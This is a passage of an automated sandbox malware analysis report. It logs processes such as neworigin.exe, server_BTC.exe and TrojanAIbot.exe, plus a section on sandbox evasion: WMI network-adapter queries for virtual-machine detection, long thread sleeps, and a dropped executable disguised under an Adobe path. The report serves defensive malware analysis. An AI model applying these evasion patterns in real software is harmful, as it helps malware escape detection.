                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 4B70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2E00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2C70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2E10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4E10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: F10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 28F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 48F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: D30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2B10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2840000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 1790000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 3390000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 30D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 3050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 3220000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 5220000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: FA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2C60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 11C0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 17A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 3270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 5270000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4722Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 5080Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5417
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 674
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 4989
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 4798
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 524
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 2214
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 3850
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 5961
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI coverage: 10.0 %
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep count: 38 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99848s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 936Thread sleep count: 4722 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99723s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99602s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99493s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99378s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99257s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99138s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99026s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98869s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98766s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 936Thread sleep count: 5080 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98641s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98208s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -98066s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -97860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -97666s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -97538s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -97427s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -97302s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -97183s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -97066s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -96934s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -96809s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -96701s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -96590s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -96478s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -96357s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -96247s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -96103s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -95994s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -95870s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -95423s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -95278s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -95168s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -95046s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94892s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94763s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94654s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94544s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94435s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94326s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94216s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -94106s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -93992s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -93884s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -93778s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -93669s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 800Thread sleep time: -99843s >= -30000sJump to behavior
